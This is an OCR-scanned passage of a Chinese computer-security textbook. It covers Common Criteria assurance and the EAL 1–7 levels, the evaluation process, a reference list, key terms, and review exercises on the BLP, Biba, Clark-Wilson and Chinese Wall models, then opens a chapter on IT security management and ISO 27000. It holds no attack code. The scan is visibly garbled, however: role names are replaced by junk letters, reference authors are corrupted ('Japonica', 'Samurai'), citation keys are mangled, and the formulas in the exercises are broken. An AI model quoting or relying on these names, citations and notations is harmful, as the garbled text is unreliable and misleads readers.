e 用 户 指南 (包括 关于 安装 、 维 护 和 使 用 的 产品 手册 ) 具有 规定 的 质量 和 适用 性 。 
PP 还 列 出 了 IT 环境 的 安全 要 求 ， 其 包含 下 列 主 题 : 
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e 密码 密 钥 分 配 。 

。 密码 密 钥 销毁 。 

e 安全 角色 。 

PP 的 最 后 一 部 分 (不 包括 附录 ) 是 PP 中 所 有 节选 和 定义 的 详细 解释 。 该 PP 是 整个 行业 
的 努力 结果 ， 从 而 使 得 具有 各 种 内 部 机 制 和 实现 方法 的 各 种 产品 可 以 满足 它 的 能 力 成 为 现实 。 


13.7 ”保障 与 评价 


NIST《 计 算 机 安全 手册 》( Computer Security Handbook) [NIST95] 用 下 面 的 方式 来 刻画 保 
障 (assurance): “安全 保障 是 一 个 人 对 安全 控制 措施 正确 运行 并 按 预期 保护 系统 的 信任 度 。” 与 
计算 机 安全 的 其 他 方面 一 样 ， 必 须 对 投入 保障 的 资源 进行 某 种 成 本 效益 分 析 ， 以 决定 对 于 期 望 
的 保障 级 付出 多 少 代价 是 合理 的 。 


13.7.1 目标 读者 


保障 措施 的 设计 部 分 依赖 于 这 些 措 施 的 目标 读者 。 也 就 是 说 ， 在 开发 安全 措施 的 信任 度 
时 ,我 们 需要 规定 哪些 个 人 或 团体 具有 该 信任 度 。CC 关于 保障 的 文档 [CCPS12c] 列 出 了 下 面 
的 目标 读者 : 
e HA (consumer): 为 系统 选择 安全 特征 和 功能 ， 确 定 所 需 的 安全 保障 级 。 
o FEE (developer): 响应 真实 的 或 者 感知 的 用 户 安全 要 求 ; 解释 保障 要 求 的 表述 ; 确 
定 保 障 方法 和 工作 量 水 平 。 
© 评价 者 (evaluator) : 评价 安全 特征 和 控制 措施 时 ， 使 用 保障 要 求 作 为 评价 准则 的 强制 
表述 。 
评价 者 可 以 在 同一 个 组 织 作为 用 户 或 者 第 三 方 评 价 团 队 。 


13.7.2 ”保障 范围 


保障 涉及 IT 产品 如 计算 机 、 数 据 库 管理 系统 、 操 作 系统 和 整个 系统 的 安全 特征 。 保 障 运 
用 到 系统 的 下 列 方面 : 

e EBX (requirement): 这 一 类 别 指 对 产品 的 安全 要 求 。 

e 安全 策略 (security policy): 基于 要 求 ， 安 全 策略 可 以 定义 。 

© 产品 设计 (product design): 基于 要 求 和 安全 策略 。 

o 产品 实现 (product implementation): 基于 设计 。 

© 系统 运行 (system operation): 包括 普通 使 用 以 及 维护 。 

在 每 个 领域 ， 都 可 以 采取 各 种 方法 来 提供 保障 。[CCPS12c] 列 出 了 下 面 的 可 能 方法 : 

e 分 析 和 检查 过 程 和 程序 。 

e 检查 正在 应 用 的 过 程 和 程序 。 

© 分 析 TOE 设计 表示 之 间 的 对 应 关系 。 

e 分 析 TOE 设计 表示 与 要 求 之 间 的 对 应 关系 。 

o 验证 证 据 。 

e 分 析 指 导 性 文档 。 

e 分 析 开 发 的 功能 测试 和 提供 的 结果 。 

e 独立 性 功能 测试 。 

e 分 析 脆 弱 性 (包括 缺陷 假设 )。 

e 渗透 测试 。 
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经 验 ， 但 与 当前 的 可 信 产 品 开发 成 果 有 关 。 作 者 将 保障 看 作 由 下 列 要 求 组 成 : 

e 系统 架构 ( system architecture) : 涉及 系统 开发 阶段 和 系统 运行 阶段 。 在 开发 阶段 提高 

保障 级 的 技术 实例 包括 模块 软件 设计 、 分 层 和 数据 抽象 /信息 隐藏 。 运 行 阶段 的 实例 
是 系统 的 可 信 部 分 与 用 户 进程 的 隔离 。 

e 系统 完整 性 (system integrity): 涉及 系统 硬件 和 固件 的 正确 运行 ， 一 般 通 过 周期 使 用 诊 
断 软 件 来 满足 。 
系统 测试 ( system testing): 确保 系统 特征 被 完全 测试 。 包 括 测 试 功能 操作 、 测 试 安全 
要 求 和 测试 可 能 的 穿 透 。 
设计 规范 和 验证 (design specification and verification): 涉及 有 关系 统 安 全 策略 的 系统 设 
计 与 实现 的 正确 性 。 理 想 情 况 下 ， 可 以 使 用 验证 的 形式 化 方法 。 
隐蔽 通道 分 析 (covert channel analysis) : 这 种 分 析 试 图 识别 任何 绕 过 安全 策略 的 潜在 手 
段 及 减少 或 消除 这 种 可 能 性 的 方法 。 
可 信 机 构 管理 (trusted facility management) : 涉及 系统 管理 。 一 种 方法 是 分 离 系 统 操作 
员 和 系统 管理 员 的 角色 。 另 一 种 方法 是 策略 和 程序 有 详细 规范 ， 并 有 评审 机 制 。 
可 信和 恢复 (trusted recovery): 当 系 统 从 失效 、 崩 演 或 安全 事件 中 恢复 后 ， 提 供 安 全 特征 
的 正确 运行 。 
可 信和 分 配 ( trusted distribution): 确保 受 保护 的 硬件 、 固 件 和 软件 在 从 销售 者 到 客户 的 
转移 过 程 中 不 会 受到 非 授权 修改 。 

e 配置 管理 (configuration management): 对 配置 控制 、 审 计 、 管 理 和 记 账 的 要 求 。 

这 样 我 们 可 以 看 出 ， 保 障 涉及 受 保护 资源 及 其 安全 功能 和 程序 的 设计 、 实 现 和 运行 。 需 要 
注意 的 很 重要 的 一 点 是 ， 保 障 是 一 个 过 程 ， 而 不 是 结果 。 也 就 是 说 ,保障 必须 是 持续 的 活动 ， 
包括 测试 、 审 计 和 评审 。 


13.7.3 ”通用 准则 评价 保障 级 


评价 保障 是 一 个 很 难 讲 清 楚 的 概念 。 而 且 ， 所 需 的 保障 程度 也 因 环 境 和 功能 性 而 异 。 为 了 
构建 保障 需要 ，CC 定义 了 一 个 对 保障 评级 的 尺度 ， 由 七 个 评价 保障 级 组 成 ， 保 障 证 据 的 严格 
性 和 范围 从 最 小 (EAL 1 ) 到 最 大 (EAL 7 )。 这 些 级 别 如 下 : 

e EAL 1: 功能 测试 ( functionally tested)。 适 用 于 安全 威胁 并 不 非常 严重 的 场合 。 它 [477 
涉及 没有 来 自 产 品 开发 者 的 输入 的 独立 性 产品 测试 。 其 意图 是 提供 正确 运行 的 信任 
级 别 。 

EAL 2: 结构 测试 (structurally tested)。 包 括 复查 由 产品 开发 者 提供 的 高 层 设 计 。 而 且 ， 
开发 者 必须 实施 对 熟知 缺陷 的 脆弱 性 分 析 。 其 意图 是 提供 一 种 低 到 中 等 级 别 的 独立 保 
障 的 安全 性 。 

e EAL 3 : 系统 地 测试 和 检查 (methodically tested and checked)。 要 求 重点 在 安全 特征 。 
其 包括 的 要 求 有 : 设计 需 将 安全 相关 组 件 与 非 安 全 相关 组 件 分 离 ; 设计 需 规定 安全 性 
如 何 执行 ; 测试 需 基 于 接口 和 高 层 设计 ， 而 不 是 仅 基于 接口 的 黑 盒 测 试 。 它 适用 于 以 
下 情况 : 要 求 是 针对 中 等 级 别 的 独立 保障 的 安全 性 的 ， 在 没有 再 次 进行 真正 的 工程 实 
践 的 情况 下 ， 对 TOE 及 其 开发 过 程 进 行 彻底 调查 。 

EAL 4 : 系统 地 设计 、 测 试 和 复查 (methodically designed, tested and reviewed)。 要 求 
低层 和 高 层 的 设计 规范 。 要 求 接口 规范 是 完整 的 。 要 求 显 式 定义 产品 安全 性 的 抽象 模 
型 。 要 求 独立 脆弱 性 分 析 。 它 适用 于 以 下 这 些 情 况 : 开发 者 或 使 用 者 对 传统 的 商品 化 
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的 TOE 需要 一 个 中 等 到 高 等 级 别 的 独立 保障 的 安全 性 ， 和 准备 负担 额外 的 安全 专用 工 
程 费 用 。 
© EAL 5 : 半 形 式 化 设计 和 测试 (semiformally designed and tested) 。 提 供 包含 所 有 实现 的 
分 析 。 保 障 由 下 列 内 容 补充 : 形式 化 模型 、 功 能 规范 和 高 层 设 计 的 半 形 式 化 表示 ， 以 
及 它们 之 间 对 应 性 的 半 形 式 化 论证 。 脆 弱 性 搜索 必须 确保 抵御 具有 中 等 攻击 潜力 的 穿 
透 性 攻击 者 。 隐 项 通道 分 析 和 模块 化 设计 也 是 要 求 的 。 
o EAL 6 : 半 形 式 化 验证 的 设计 和 测试 (semiformally verified design and tested), FF 
发 者 通过 把 专业 安全 工程 技术 应 用 于 严格 的 开发 环境 ， 而 获得 高 度 的 保障 ， 以 便 生产 
一 个 昂贵 的 TOE 来 保护 高 价值 的 资产 对 抗 重大 的 风险 。 脆 弱 性 独立 搜索 必须 确保 抵御 
具有 高 等 攻击 潜力 的 穿 透 性 攻击 者 。 
© EAL 7 : 形式 化 验证 的 设计 和 测试 (formally verified design and tested)。 形 式 化 模型 由 
功能 规范 和 高 层 设计 的 形式 化 表示 加 以 补充 ， 并 说 明 它 们 的 对 应 性 。 开 发 者 对 内 部 
“ 白 盒 ”测试 的 证 据 和 开发 者 测试 结果 的 全 部 独立 确认 是 要 求 的 。 设 计 复 杂 性 必须 最 
小 化 。 
前 4 个 级 别 反映 了 商业 设计 实践 的 不 同 级 别 。 仅 在 这 些 级 别 中 的 最 高 级 (EAL 4 ) 要 求 源 
代码 分 析 ， 但 也 仅 对 于 代码 的 一 部 分 。 最 高 三 个 级 别 使 用 安全 专家 和 安全 专用 设计 和 工程 方法 
为 产品 开发 提供 了 具体 的 指导 。 


13.7.4 评价 过 程 


用 可 信 计 算 标 准 评价 一 个 IT 产品 (TOE) 的 目的 是 确保 TOE 的 安全 特征 正确 、 有 效 地 工 
作 ， 并 显示 没有 可 利用 的 脆弱 性 。 评 价 过 程 可 能 与 TOE 的 开发 同步 进行 或 随后 进行 ， 这 取决 
于 所 需 的 保障 级 。 级 别 越 高 ， 过 程 需 要 的 严格 性 越 强 ， 付 出 的 时 间 和 费用 越 多 。 评 价 的 主要 输 
人 是 安全 目标 、 关 于 TOE 的 一 组 证 据 和 实际 的 TOE。 评 价 过 程 的 期 望 结果 是 确认 安全 目标 由 
TOE 满足 ， 这 是 通过 技术 评价 报告 中 的 文档 化 的 证 据 所 证 实 的 。 
评价 过 程 将 把 安全 目标 与 TOE 的 高 层 设计 、 低 层 设计 、 功 能 规范 、 源 代码 实现 和 目标 代 
码 与 硬件 实现 中 的 一 个 或 多 个 联系 起 来 。 使 用 的 严格 性 程度 和 分 析 深 度 由 评价 的 期 望 保障 级 决 
定 。 在 最 高 级 别 ， 半 形式 化 或 形式 化 模型 用 来 确认 TOE 确实 实现 了 期 望 安 全 目标 。 评 价 过 程 
还 涉及 仔细 测试 TOE 来 确认 其 安全 特征 。 
评价 涉及 很 多 方面 : 
e 发 起 者 (sponsor) : 通常 是 需要 评价 的 产品 的 用 户 或 销售 者 。 发 起 者 决定 产品 必须 满足 
的 安全 目标 。 
© 开发 者 (developer): 必须 提供 设计 、 实 现 和 测试 产品 过 程 中 的 合适 证 据 ， 使 产品 能 被 评价 。 
© WHS (evaluator): 使 用 开发 者 提供 的 证 据 和 产品 的 额外 测试 来 完成 技术 上 的 评价 工 
作 ， 以 便 确 认 产 品 满足 安全 目标 规定 的 功能 和 保障 要 求 。 在 很 多 国家 ， 依 据 可 信 计 算 
标准 进行 的 产品 评价 工作 被 委托 给 一 个 或 多 个 经 认可 的 商业 提供 商 。 
o 认证 者 (certifier): 政府 机 构 监督 评价 过 程 ， 随 后 认证 产品 已 被 成 功 评价 。 认 证 者 一 般 
管理 一 个 已 评价 产品 的 名 单 ， 可 由 用 户 查 阅 。 
评价 过 程 包括 三 个 大 的 阶段 : 
1. 准备 (preparation): 涉及 发 起 者 与 产品 开发 者 、 将 进行 评价 的 评价 者 之 间 的 最 初 联系 。 
这 将 确认 发 起 者 和 开发 者 已 充分 准备 实施 评价 并 包括 对 安全 目标 及 其 他 可 交付 评价 的 复查 。 其 
得 出 的 结论 是 一 个 可 交付 评价 列表 及 对 整个 项 目的 成 本 和 进度 的 接受 。 
2. 评价 实施 (conduct of evaluation) : 评价 者 实施 一 系列 CC 指定 活动 的 结构 化 、 形 式 化 过 
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程 。 包 括 评审 由 发 起 者 和 开发 者 提供 的 交付 材料 及 产品 的 其 他 测试 ， 来 确认 其 是 否 满 足 安全 目 


标 。 在 这 个 过 程 中 ,产品 中 的 问题 可 能 被 标识 出 来 ， 以 便 反馈 给 开发 者 修正 。 

3. 结论 ( conclusion) : 评价 者 为 认证 者 接受 评价 提供 最 终 的 评价 技术 报告 。 认 证 者 使 用 这 
个 可 能 包含 保密 信息 的 报告 来 验证 评价 过 程 ， 并 准备 公开 的 认证 报告 。 认 证 报告 继而 被 列 人 相 
关 的 已 评价 产品 名 单 。 

每 个 国家 的 评价 过 程 通常 都 由 政府 机 构 监 督 和 管理 。 在 美国 ，NIST 和 NSA 联合 实行 通用 
准则 评价 和 验证 方案 (Common Criteria Evaluation and Validation Scheme，CCEVS)。 很 多 国家 
支持 对 等 的 安排 ， 即 允许 评价 在 一 个 国家 进行 ， 而 认可 和 接受 在 其 他 国家 进行 。 指 定 由 评价 产 
生 的 时 间 和 费用 对 于 销售 者 和 用 户 都 具有 很 大 好 处 。CC 门户 (Common Criteria Portal) 提供 了 
相关 机 构 和 有 关 国 家 采用 过 程 的 更 多 信息 。 


13.8 ”推荐 读物 


[LAND81] 是 计算 机 安全 模型 的 全 面 概 述 ， 但 没有 提 到 任何 数学 或 形式 化 细节 。[BELL05] 
总 结 了 Bell-LaPadula 模型 ， 并 分 析 了 它 与 同期 系统 设计 和 实现 的 相关 性 。 

[GALL09] 是 对 本 章 所 涉及 主题 的 有 价值 的 概述 。[GASS88] 提供 了 对 可 信 计 算 机 系统 的 综 
合 研 究 。[SAYD04] 是 对 军事 和 商业 情境 中 多 级 安全 发 展 的 历史 总 结 。 

[BERT95] 和 [LUNT90] 分 析 了 与 数据 库 系统 中 多 级 安全 应 用 有 关 的 问题 。[DENN85] 和 
[MORG87] 着 重 研究 多 级 安全 数据 库 中 的 推理 问题 。 

[OPPL05] 和 [FELT03] 提供 了 对 可 信 计 算 和 TPM 的 综述 。[ENGL03] 描 述 了 微软 在 
Windows 中 实现 可 信 计 算 的 方法 。 
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BERT95 Bertino, E.; Japonica, S.; and Samurai, P. “Database Security: Research and 
Practice.” Information Systems, Vol. 20, No. 7, 1995. 

DENN8S5 Denning, D. “Commutative Filters for Reducing Interference Threats in 
Multilevel Database Systems.” Proceedings of 1985 IEEE Symposium on 
Security and Privacy, 1985. 

ENGL03 England, P., et al. “A Trusted Open Platform.” Computer, July 2003. 

FELT03 Felten, E. “Understanding Trusted Computing: Will Its Benefits Outweigh 
its Drawbacks?” IEEE Security and Privacy, May/June 2003. 

GALLO9 Galley, E., and Mitchell, C. “Trusted Computing: Security and Applications.” 
Cryptologia, Volume 33, Number 1, 2009. 

GASS88 Gasser, M. Building a Secure Computer System. New York: Van Nostrand 
Reinhold, 1988. 

LAND81 Landwehr, C. “Formal Models for Computer Security.” Computing Surveys, 
September 1981. i 

LUNT90 Lunt, T., and Fernandez, E. “Database Security.” ACM SIGMOD Record, 
December 1990. 

MORG87 Morgenstern, M. “Security and Inference in Multilevel Database and 
Knowledge-Base Systems.” ACM SIGMOD Record, December 1987. 

OPPLOS Oppliger, R., and Rytz, R. “Does Trusted Computing Remedy Computer 
Security Problems?” JEEE Security and Privacy, March/April 2005. 

SAYD04 Saydjari, O. “Multilevel Security: Reprise.” IEEE Security and Privacy, 
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13.9 关键 术语 、 复 习题 和 习题 


关键 术语 


Bell-LaPadula (BLP) model (Bell-LaPadula 模型 ) 

Biba integrity model (Biba 完整 性 模型 ) 

certification rules (认证 规则 ) 

Chinese Wall Model (中 国 墙 模型 ) 

Clark-Wilson integrity model ( Clark-Wilson 完整 性 
模型 ) 

class (类 ) 

Common Criteria (CC， 通 用 性 准则 ) 

component (组 件 ) 

ds-property (ds- 特性 ) 

enforcement rules (执行 规则 ) 

family ( 族 ) 

mandatory access control MAC， 强制 访问 控制 ) 

multilevel security (MLS， 多 级 安全 ) 

polyinstantiation (多 实例 ) 

reference monitor (基准 监视 器 ) 

sanitized data (净化 数据 ) 

security assurance requirements (安全 保障 要 求 ) 

security class (安全 类 ) 

security classification (安全 等 级 ) 


复习 题 


13.1 
13.2 
13.3 
13.4 
13.5 
13.6 
13.7 
13.8 
13.9 
13.10 
13.11 
13.12 
13.13 


BLP 模型 规定 的 三 个 规则 是 什么 ? 
自主 访问 控制 是 如 何 被 加 入 BLP 模型 的 ? 
BLP 模型 与 Biba 模型 的 主要 区 别 是 什么 ? 
Biba 模型 规定 的 三 个 规则 是 什么 ? 


基准 监视 器 实施 的 两 个 规则 是 什么 ? 
基准 监视 器 要 求 具有 哪些 特性 ? 


什么 是 多 实例 ? 
简要 描述 TPM 提供 的 三 个 基本 服务 。 


一 般 来 说 ，MLS 如 何在 RBAC 系统 中 实现 ? 
描述 MLS 数据 库 系 统 可 能 具有 的 各 个 可 能 的 粒度 级 别 。 


security clearance (安全 许可 ) 

security function requirements (安全 功能 要 求 ) 

security kernel database〈 安 全 内 核 数据 库 ) 

security level (安全 级 别 ) 

security objective (安全 目标 ) 

security requirements (安全 要 求 ) 

simple security property ( ss-property) (简单 安全 性 ， 
ss- 特性 ) 

target of evaluation (评价 对 象 ) 

threat (威胁 ) 

Trojan horse (特洛伊 木马 ) 

trust (信任 ) 

trusted computer system〔 可 信 计 算 机 系统 ) 

trusted computing (可 信 计 算 ) 

trusted computing base (可 信 计 算 基 ) 

trusted platform module (TPM ， 可 信 平 台 模 块 ) 

trusted system (可 信 系 统 ) 

trustworthy system (可 信赖 系统 ) 

*-property (*- 特性 ) 


解释 术语 安全 类 、 安 全 级 别 、 安 全 许可 与 安全 等 级 之 间 的 区 别 。 


解释 Cark-Wilson 模型 中 认证 规则 与 实施 规则 之 间 的 区 别 。 
中 国 墙 模型 中 术语 “中 国 墙 ”的 含义 是 什么 ? 


13.14 
13.15 
13.16 
13.17 


依据 可 信 计 算 评价 标准 评价 IT 产品 的 目的 是 什么 ? 

在 可 信 计 算 评 价 标准 中 采用 的 安全 保障 与 安全 功能 的 区 别 是 什么 ? 

安全 评价 过 程 一 般 涉及 哪 几 方面 ? 

依据 可 信 计 算 标准 (如 通用 性 准则 ) 评价 IT 产品 的 三 个 主要 阶段 是 什么 ? 
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习题 


13.1 对 于 多 级 安全 系统 来 说 ,“ 不 上 读 ” 的 必要 性 是 显而易见 的 。 那 么 ,“ 不 下 写 ” 的 规则 有 什么 重要 性 ? 
13.2 *- 特性 对 追加 访问 的 要 求 大 (S) 入 上 (2) 要 比 对 写 访问 的 要 求 有 (5)=f(O)) 宽松 。 解释 其 原因 。 
13.3 BLP 模型 要 求 b 的 每 个 元 素 都 遵守 ss- 特性 和 *- 特性 ,但 没有 显 式 规定 M 中 的 每 一 项 都 必须 满足 
ss- 特性 和 *- 特性 。 
a. 解释 为 什么 不 严格 要 求 对 M 施加 两 个 特性 。 
b. 实践 中 ， 你 是 否 期 待 在 M 上 要 求 两 个 特性 的 安全 设计 或 实现 ? 解释 之 。 
13.4 针对 图 13-2 中 的 例子 ， 说 明 对 于 该 情景 中 的 每 个 动作 ， 将 调用 8 个 BLP 规则 中 的 哪 一 个 。 
13.5 在 图 13-2 中 ， 从 级 别 角色 向 下 指向 操作 角色 的 实 箭头 线 表 示 一 个 角色 层次 ， 具 有 指出 访问 权 ( 读 、 
写 ) 的 操作 角色 作为 级 别 角色 的 子 集 。 从 一 个 操作 角色 指向 另 一 个 操作 角色 的 实 箭头 线 表 示 什么 ? 
13.6 考虑 下 面 使 用 一 种 通用 规范 语言 书写 的 系统 规范 : 
constants 
subjects = set of processes 
sec_labels = {1, 2, 3, .MAX} such that 1 < 2 < ++ < MAX 
files = set of information sequences 
label:subjects > sec_labels 
class(repository) = MAX 
variables 
repository := set of all sets of files 
initial state 
repository = null set 
actions 
insert (s E subjects) 
precondition f E files and repository =R 
postcondition repository =R ( {f} 
browse (s E subjects) 
precondition f E repository and label(s) = MAX 
postcondition true 
系统 包含 一 个 有 标号 进程 的 固定 集合 。 每 个 进程 可 以 插入 和 浏览 具有 最 高 安全 标号 的 文件 储存 库 
中 的 信息 。 
a. 通过 填空 提供 系统 的 形式 化 定义 : 
For alls E subjects; 
allow (s, repository, browse(s)) iff ____ 
allow (s, repository, insert(s)) iff _____ 
b. 论证 这 个 规范 满足 两 个 BLP 规则 。 
13.7 现在 考虑 前 面 问题 中 的 规范 发 生 下 列 变化 : 
insert (s € subjects) 
precondition f € files and repository = R and label(s) = MAX 
postcondition repository = R ( {f} 
browse (s E subjects) 
precondition repository = null set 
postcondition true 
a. 提供 类 似 于 前 面 问题 的 系统 形式 化 定义 。 
b. 论证 这 个 规范 满足 两 个 Biba 模型 规则 。 
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13.8 下 面 的 每 个 描述 用 到 Clark-Wilson 模型 中 的 一 个 或 多 个 规则 。 识 别 出 每 种 情况 中 的 规则 。 


a. 提供 保证 CDI 内 部 一 致 性 的 级 别 框架 。 

b. 提 供 一 种 外 部 一 致 性 机 制 ， 用 来 控制 哪个 人 可 以 执行 哪个 指定 CDI 上 的 程序 。 这 是 职责 分 离 
机 制 。 

c. 提供 用 户 鉴别 。 

d. 维护 TP 记录 

e. 控制 使 用 UDI 来 更 新 或 创建 CDI. 

f 使 得 完整 性 实施 机 制 是 强制 的 而 非 自主 的 。 


13.9 在 图 13-8 中 ， 特 洛 伊 木马 “ 先 复 制 再 查看 ”的 链条 被 切断 。Alice 还 可 能 采用 其 他 两 个 角度 攻击 : 


13.10 


13.11 


13.12 


13.13 


13.14 


Alice 登录 并 试图 直接 读 字符 串 ; Alice 给 后 口袋 文件 分 配 敏 感 安全 级 。 基 准 监视 器 能 阻止 这 些 攻 
击 吗 ? 
13.4 节 给 出 了 当 低 许可 (公开 级 ) 用 户 请 求 插入 一 行 ， 其 主键 与 已 有 的 本 身 或 其 一 个 元 素 处 于 更 
高 密级 的 行 的 主键 相同 时 ，DBMS 的 三 种 选择 。 现 在 假设 高 密级 用 户 想 插入 与 已 有 低 密 级 行 的 主 
键 相 同 的 行 。 列 出 并 评论 DBMS 的 选择 。 
当 你 复查 依据 通用 准则 评价 的 产品 列表 (如 通用 准则 门户 网 站 上 列 出 的 ) 时 ， 很 少 有 产品 被 评价 
到 更 高 的 EAL 6 和 EAL 7 保障 级 。 指 出 为 什么 这 些 级 别 的 要 求 限制 了 能 被 评价 到 这 些 级 别 的 产品 
的 类 型 和 复杂 性 。 你 觉得 通用 操作 系统 或 数据 库 管 理 系统 能 被 评价 到 这 些 级 别 吗 ? 
调查 你 的 国家 是 否 有 管理 通用 准则 产品 评价 的 政府 机 构 。 找 到 实现 此 功能 的 Web 站 点 ， 然 后 找 出 
该 机 构 认 可 的 已 评价 / 验证 产品 列表 。 或 者 ， 找 到 通用 准则 门户 网 站 上 的 列表 。 
假定 你 在 一 个 政府 机 构 工 作 ， 需 要 购买 经 评价 已 达到 CC 保障 级 EALS 或 更 高 级 别 的 智能 卡 用 于 
个 人 标识 。 从 你 在 习题 13.14 中 找到 的 评价 产品 列表 中 选 出 满足 该 需求 的 某 些 产品 。 分 析 其 认证 
报告 。 然 后 提出 一 些 可 以 用 来 在 这 些 产 品 中 进行 选择 的 准则 。 
假定 你 在 一 个 政府 机 构 工 作 ， 需 要 购买 经 评价 已 达到 CC 保障 级 EAL4 或 更 高 级 别 的 网 络 防火 墙 
设备 。 从 你 在 习题 13.14 中 找到 的 评价 产品 列表 中 选 出 满足 该 需求 的 某 些 产品 。 分 析 其 认证 报告 。 
然后 提出 一 些 可 以 用 来 在 这 些 产 品 中 进行 选择 的 准则 。 
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IT 安全 管理 与 风险 评估 





学 习 目 标 

学 习 完 本 章 之 后 ， 你 应 该 能 够 : 

o 理解 IT 安全 管理 涉及 的 过 程 ; 

o 描述 组 织 的 IT 安全 目标 、 战 略 和 方针 ; 


详细 描述 IT 安全 风险 评估 的 可 选 方法 ; 

详细 描述 形式 化 IT 安全 风险 评估 所 需 步 又; 
描述 已 识别 威胁 和 后 果 的 特征 ， 并 确定 风险 ; 
详细 描述 风险 处 置 可 选 方案 。 


在 前 面 各 章 中 ， 我 们 讨论 了 一 系列 可 以 用 于 管理 和 提高 计算 机 系统 和 网 络 安全 的 技术 和 管 
理 措施 。 在 本 章 和 下 一 章 中 ， 我 们 将 重点 讨论 如 何 对 这 些 措施 进行 最 优选 择 并 付 诸 实施 ， 以 有 
效 地 满足 组 织 的 安全 要 求 的 过 程 。 正 如 第 1 章 中 提 到 的 ， 这 涉及 如 下 三 个 基本 问题 : 

1， 哪 些 资产 需要 保护 ? 

2. 这 些 资产 受到 哪些 威胁 ? 

3. 如 何 应 对 这 些 威胁 ? 

IT 安全 管理 是 回答 上 述 问题 的 形式 化 过 程 ， 它 能 够 确保 关键 资产 以 最 经 济 的 方式 得 到 充 
分 保护 。 更 确切 地 说 ，IT 安全 管理 由 以 下 一 些 步骤 组 成 。 首 先 ， 为 组 织 的 IT 安全 目标 和 总 体 
风险 状况 确定 一 个 清晰 的 视图 。 然 后 ， 对 组 织 中 每 个 需要 保护 的 资产 进行 IT 安全 风险 评估 ， 
通过 评估 回答 上 述 三 个 关键 问题 。 风 险 评估 提供 了 必要 的 信息 ， 以 决定 要 将 已 识别 的 风险 降低 
到 可 以 接受 的 水 平 或 者 接受 最 终 风 险 ， 需 要 采取 哪些 管理 、 运 行 和 技术 控制 措施 。 接 下 来 的 步 
又 是 选择 适当 的 控制 ， 并 编写 计划 和 规程 以 确保 这 些 必 要 的 控制 措施 被 有 效 地 实施 。 必 须 对 实 
施 过 程 进行 监视 ， 以 确定 是 否 满足 安全 目标 。 由 于 技术 和 风险 环境 都 在 快速 变化 ， 因 而 整个 
过 程 必须 循环 往复 ， 保 持 计划 和 规程 不 断 更 新 。 该 过 程 的 后 半 部 分 内 容 将 在 第 15 章 中 讨论 。 
随后 各 章 将 阐述 具体 的 控制 域 ,， 第 16 章 介绍 物理 安全 ， 第 17 章 介绍 人 为 因素 ， 第 18 章 介绍 
审计 。 
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最 近 几 十 年 ， 随 着 网 络 化 计算 机 系统 的 快速 发 展 及 对 其 依赖 性 的 增强 ， 与 之 相关 的 风 
险 也 不 断 增长 ，IT 安全 管理 发 生 了 很 大 的 变化 。 在 过 去 的 十 年 中 ， 大 量 美 国 国家 标准 和 
国际 标准 陆续 出 台 。 这 代表 了 对 这 一 领域 的 “最 佳 实践 ”所 达成 的 共识 。 国 际 标准 化 组 织 
( International Standards Organization, ISO) 对 这 些 标准 进行 了 修订 并 整合 而 成 ISO 27000 系 
列 。 表 14-1 详细 地 列 出 了 该 标准 族 中 最 近 被 采用 的 标准 。 在 美国 ，NIST 也 制定 了 许多 相关 
的 标准 ， 包 括 [NIST06]、[NIST09] 和 [NIST12]。 随 着 安然 破产 案 和 政府 组 织 泄露 个 人 信息 
等 安全 事件 的 发 生 ， 对 公司 治理 的 关注 持续 增长 ， 审 计 人 员 日 益 要 求 这 些 组 织 遵 循 诸如 此 类 
的 正式 标准 。 
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表 14-1 KF IT 安全 技术 的 1SO/IEC 27000 系列 标准 


“信息 安全 管理 体系 一 一 概述 与 词汇 ”提供 了 信息 安全 管理 体系 的 概述 ， 定 义 了 27000 标准 
族 中 使 用 的 词汇 和 定义 


“信息 安全 管理 体系 一 一 要 求 ” 规 定 了 建立 、 实 施 、 运 行 、 监 视 、 评 审 、 保 持 和 改进 文件 化 
的 信息 安全 管理 体系 的 要 求 


“信息 安全 管理 实用 规则 ”提供 了 组 织 内 进行 信息 安全 管理 的 指南 ， 包 含 作为 最 佳 实践 的 安 
全 控制 措施 列表 。 以 前 称 为 ISO17799 


“信息 安全 管理 体系 实施 指南 ” 详 述 了 信息 安全 管理 体系 规范 及 其 设计 的 过 程 ， 从 开始 到 产 


27000:2012 


27001:2005 


27002:2005 


27003:2010 


生 实 施 计划 
27004:2009 “信息 安全 管理 体系 一 一 测量 ”对 帮助 组 织 测量 和 报告 其 信息 安全 管理 体系 过 程 和 控制 措施 
的 有 效 性 提供 了 指导 
27005:2011 “信息 安全 风险 管理 ”提供 了 有 关 信 息 安全 风险 管理 过 程 的 指南 。 替 代 ISO13335-3/4 
27006:2007 “信息 安全 管理 体系 审核 和 认证 组 织 要 求 ” 对 这 些 组 织 规定 了 要 求 ， 提 供 了 指南 


[ISO13335] 为 管理 安全 提供 了 一 个 概念 框架 。 它 定义 IT 安全 管理 如 下 : 


IT 安全 管理 : 用 来 实现 和 保持 适当 级 别 的 保密 性 、 完 整 性 、 可 用 性 、 可 核查 性 、 真 实 性 和 
可 靠 性 的 过 程 。IT 安全 管理 职能 包括 : 
© 确定 组 织 的 IT 安全 目标 、 战 略 和 方针 。 

确定 组 织 的 IT 安全 要 求 。 

识别 和 分 析 组 织 内 IT 资产 面临 的 安全 威胁 。 

识别 和 分 析 风 险 。 


规定 适当 的 安全 防护 措施 。 
监视 必要 的 安全 防护 措施 的 实施 和 运行 ， 以 便 为 组 织 内 部 的 信息 和 服务 提供 最 经 济 的 
保护 。 
开发 和 实施 安全 意识 项 目 。 
e 检测 和 响应 事件 。 





图 14-1 (改编 自 [ISO27005] 图 1 和 [ISO13335 第 3 部 分 ] 图 1) 说 明了 这 个 过 程 ， 其 中 特 
别 说 明了 与 风险 评估 过 程 相关 的 内 部 细节 。 应 该 强调 的 是 ，IT 安全 管理 有 必要 成 为 组 织 整 体 
管理 计划 的 一 个 关键 组 成 部 分 。 类 似 地 ，IT 安全 风险 评估 过 程 也 应 当 被 纳 人 对 组 织 的 全 部 资 
产 和 业务 过 程 实施 的 更 广泛 的 风险 评估 之 中 。 因 此 ， 如 果 IT 安全 管理 过 程 得 不 到 组 织 高 级 管 
理 层 的 重视 和 支持 ， 就 不 大 可 能 达到 期 望 的 安全 目标 ， 也 不 能 为 组 织 的 业务 成 果 做 出 适当 的 贡 
献 。 同 样 需要 注意 的 是 ，IT 管理 并 非 一 劳 永 逸 的 事情 ， 而 是 一 个 循环 过 程 ， 必 须 不 断 地 重复 ， 
这 样 才能 与 IT 技术 和 风险 环境 的 快速 变化 保持 同步 。 

